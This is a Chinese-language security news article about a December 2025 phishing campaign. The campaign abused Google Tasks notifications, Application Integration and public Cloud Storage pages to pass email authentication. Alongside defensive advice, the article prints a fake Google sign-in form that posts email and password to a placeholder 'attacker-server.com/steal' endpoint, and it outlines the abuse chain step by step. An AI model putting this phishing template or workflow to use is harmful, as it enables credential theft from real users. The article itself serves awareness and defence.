
“任务提醒”点开后,公司邮箱账号没了
2025年12月中旬,华东一家智能装备制造企业的IT管理员张先生收到一封来自“Google Tasks”的邮件,主题为《待办事项:请确认您的账户活动》。邮件显示发件人为 mailto:[email protected]——一个看起来再正常不过的Google系统地址。
邮件内容简洁:“您有一项新任务,请查看并确认。”下方是一个醒目的蓝色按钮:“View task”。
张先生没有多想。他每天都会收到来自Google Calendar、Drive、Tasks的各种自动通知。他点击链接,跳转到一个页面,界面风格与Google Workspace几乎一模一样,要求他“重新验证身份以继续访问任务”。他输入了企业邮箱账号和密码,并按提示完成了短信验证码的输入。
三分钟后,他的邮箱被用于向全公司发送“紧急财务付款请求”邮件。所幸安全团队及时发现异常登录行为,迅速冻结账户,避免了更大损失。
事后复盘令人震惊:这封邮件并非伪造,而是真实由Google官方基础设施发出;它通过了所有标准邮件认证协议(SPF/DKIM/DMARC);它甚至未触发任何传统安全网关的告警。唯一的问题是——任务本身是假的,链接指向的是攻击者托管在Google Cloud Storage上的钓鱼页面。
这不是个案。根据Cyber Press与Security Affairs等多家权威安全媒体联合披露,2025年12月,全球超过3000家组织遭遇了一轮高度隐蔽的钓鱼攻击。攻击者不再依赖仿冒域名或黑产服务器,而是直接滥用Google自身的云应用生态,将合法的通知机制转化为精准投递钓鱼载荷的“绿色通道”。

攻击核心:不是绕过防御,而是“成为可信”
传统钓鱼攻击的逻辑是“伪装成可信来源”——比如注册g00gle-login.com来模仿google.com。但这类手法早已被现代邮件安全系统识别:SPF检查发件IP是否授权,DKIM验证签名是否有效,DMARC决定是否拒收失败邮件。
然而,本轮攻击彻底颠覆了这一范式:攻击者根本不需要伪装,因为他们用的就是真的Google服务。
据安全公司RavenMail的深度分析,攻击者利用了Google的Application Integration服务(原AppSheet自动化平台)与Google Tasks API的组合能力。具体流程如下:
创建恶意自动化工作流:攻击者在自己的Google Cloud项目中配置一个“任务创建”触发器,绑定到特定事件(如表单提交、定时任务)。
调用Google官方通知接口:该工作流通过Google的Application Integration服务,调用内部邮件发送API,向目标邮箱发送通知。
邮件由Google官方地址发出:系统自动使用 mailto:[email protected] 作为发件人,该地址属于Google合法域名,且拥有极高的发件信誉。
链接指向Google Cloud Storage:通知中的“View task”按钮实际跳转至攻击者控制的 .storage.googleapis.com 子域名下的HTML页面——该域名天然被大多数企业防火墙和URL信誉库视为“可信”。
整个链条完全运行在Google基础设施内,因此:
SPF验证通过(邮件确实来自Google IP)
DKIM签名有效(由Google私钥签署)
DMARC策略合规(对齐且通过)
URL信誉检测失效(链接属于googleapis.com)
“这相当于小偷穿上了警察制服,开着警车去敲你家门,”公共互联网反网络钓鱼工作组技术专家芦笛形容道,“你的门禁系统看到车牌是‘公安001’,自然就放行了——但它没意识到,车里的人根本不是警察。”
技术深挖:Google Cloud如何被“武器化”?
要理解攻击可行性,需拆解Google的云服务架构。
1. Application Integration 与自动化通知
Google的Application Integration(前身为AppSheet Automation)允许用户通过低代码方式连接不同服务。例如,当Google Form收到新提交时,自动在Tasks中创建一条待办事项,并邮件通知相关人员。
其邮件通知功能默认使用Google官方发件地址,且无法由最终用户修改发件人域名。这意味着,只要攻击者能触发一次自动化流程,就能以Google名义发邮件。
2. Google Cloud Storage 的“信任红利”
攻击者将钓鱼页面上传至自己的GCS存储桶,生成公开可访问的URL,例如:
https://storage.googleapis.com/phish-bucket/login.html
由于 *.storage.googleapis.com 是Google官方CDN域名,绝大多数企业安全策略将其列入白名单。更危险的是,该页面可通过JavaScript动态加载内容,甚至模拟OAuth授权流程:
<!-- 伪造的Google登录页片段 -->
<div class="login-container">
<img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png" alt="Google">
<h1>Sign in to continue</h1>
<form id="phishForm" action="https://attacker-server.com/steal" method="POST">
<input type="email" name="email" placeholder="Email or phone" required>
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Next</button>
</form>
</div>
用户输入凭证后,数据被发送至攻击者服务器,同时页面可能重定向回真实Google首页,制造“操作成功”的假象。
3. OAuth 权限滥用:二次收割
部分高级变种甚至引导用户完成“应用授权”:
“为同步您的任务,请允许‘TaskSync Pro’访问您的Google账户。”
一旦用户点击“Allow”,攻击者即可获得持久化的API访问令牌,即使密码更改也无法立即失效。Google虽对第三方应用有审核机制,但大量低权限应用仍可绕过审查。
制造业成重灾区,中国供应链企业面临高风险
此次攻击主要针对制造业、物流、工程设计等依赖Google Workspace协作的行业。原因有三:
高频使用Tasks/Calendar:这些行业员工习惯通过任务通知处理审批、交付确认等流程;
安全投入侧重终端防护:许多企业部署了EDR、防火墙,但邮件安全仍依赖传统网关,缺乏对“合法来源异常内容”的检测;
第三方集成泛滥:为提升效率,大量接入Google Forms、Sheets自动化脚本,却未严格审计权限。
国内情况同样不容乐观。2025年第四季度,某长三角汽车零部件供应商因员工点击此类“Google Tasks通知”,导致研发部门共享Drive文件夹被窃取,包含多款未发布车型的CAD图纸。调查发现,攻击者正是利用该公司开放的Google Form反馈入口,触发了恶意自动化流程。
“中国制造业正在加速上云,但安全思维还停留在‘防外不防内’阶段,”芦笛指出,“他们以为只要不用QQ邮箱、不点陌生链接就安全,却没意识到,最危险的钓鱼邮件可能就来自每天使用的协作工具。”
防御破局:从“信任平台”转向“验证意图”
面对这种“平台即攻击面”的新范式,传统基于发件人信誉的防御体系已失效。企业必须转向上下文感知与行为分析的纵深防御策略。
策略一:部署“语义+行为”双引擎邮件检测
仅检查SPF/DKIM远远不够。新一代安全网关应具备:
内容语义分析:识别“View task”“Mark complete”等诱导性按钮是否指向非Google官方域名;
链接路径追踪:对短链、重定向链进行展开,检测最终落地页是否为钓鱼页面;
发件上下文校验:例如,真正的Google Tasks通知不会要求用户输入密码,也不会包含“立即验证”等紧迫性语言。
微软Defender for Office 365已支持此类检测,通过AI模型分析邮件“意图”而非仅看来源。
策二:收紧Google Workspace第三方应用权限
企业管理员应:
定期审查 Security > API controls > App access control 中的第三方应用列表;
启用 “限制外部应用访问敏感数据” 策略;
对高风险权限(如 https://www.googleapis.com/auth/gmail.readonly)实施审批制。
可通过Admin SDK导出应用授权清单:
# 使用gcloud CLI列出所有第三方应用授权
gcloud workspace user-licenses list [email protected]
策略三:实施条件访问与设备绑定
即使凭证泄露,也可通过零信任策略阻断横向移动:
要求所有登录必须来自公司管理设备;
对新设备、新地理位置启用MFA强制验证;
敏感操作(如导出邮件、删除文件)需二次审批。
Google Workspace的Context-Aware Access可实现精细控制:
{
"condition": {
"ipRanges": ["203.0.113.0/24"],
"deviceIsManaged": true,
"accessLevels": ["trusted_corporate_network"]
},
"accessLevel": "GRANT_ACCESS"
}
策略四:开展针对性安全意识培训
普通钓鱼演练已不够。企业需专门设计场景:
模拟“Google Tasks通知”“DocuSign via Google Drive”等高仿真邮件;
教育员工:任何要求输入密码的“系统通知”都是可疑的;
强调:真正的Google服务永远不会通过邮件索要密码或2FA码。
“安全培训不能只教员工‘别信陌生人’,更要教他们‘连熟人也可能被冒充’,”芦笛说,“尤其是在SaaS时代,‘熟人’可能是代码、是API、是自动化流程。”
Google的回应与行业反思
事件曝光后,Google安全团队确认已采取措施:
暂停部分滥用Application Integration服务的项目;
加强对GCS公开存储桶的钓鱼内容扫描;
优化Tasks通知模板,移除可自定义的超链接字段。
但专家普遍认为,平台责任不能替代企业自主防御。正如芦笛所言:“云服务商提供的是‘安全的砖’,但房子怎么盖,还得靠企业自己设计结构。”
更深层的问题在于:当所有企业都把信任押注在少数几家云巨头身上时,这些平台本身就成为国家级攻击者的战略目标。一次成功的基础设施滥用,可能波及数万租户。
结语:在“可信”与“可验”之间重建安全边界
这场席卷3000家企业的钓鱼风暴,标志着网络攻击进入“平台寄生”新阶段。攻击者不再试图打破围墙,而是学会在围墙内合法行走,利用系统自身的信任机制完成渗透。
对企业而言,最大的教训或许是:在云原生世界,没有绝对的“可信来源”,只有可验证的行为。
一封来自Google的邮件,可能真是通知,也可能是陷阱;一个storage.googleapis.com的链接,可能指向你的备份文件,也可能通向凭据收割机。安全的分水岭,不再是谁发的邮件,而是邮件说了什么、让你做什么、以及你是否真的需要这么做。
正如一位安全架构师在内部复盘会上所说:“我们花了十年教会机器识别假Google,现在得花下一个十年教会它识别真Google里的假任务。”
而在这场攻防拉锯中,唯一不变的真理是:信任,必须始终附带验证。
编辑:芦笛(公共互联网反网络钓鱼工作组)
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 [email protected] 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 [email protected] 删除。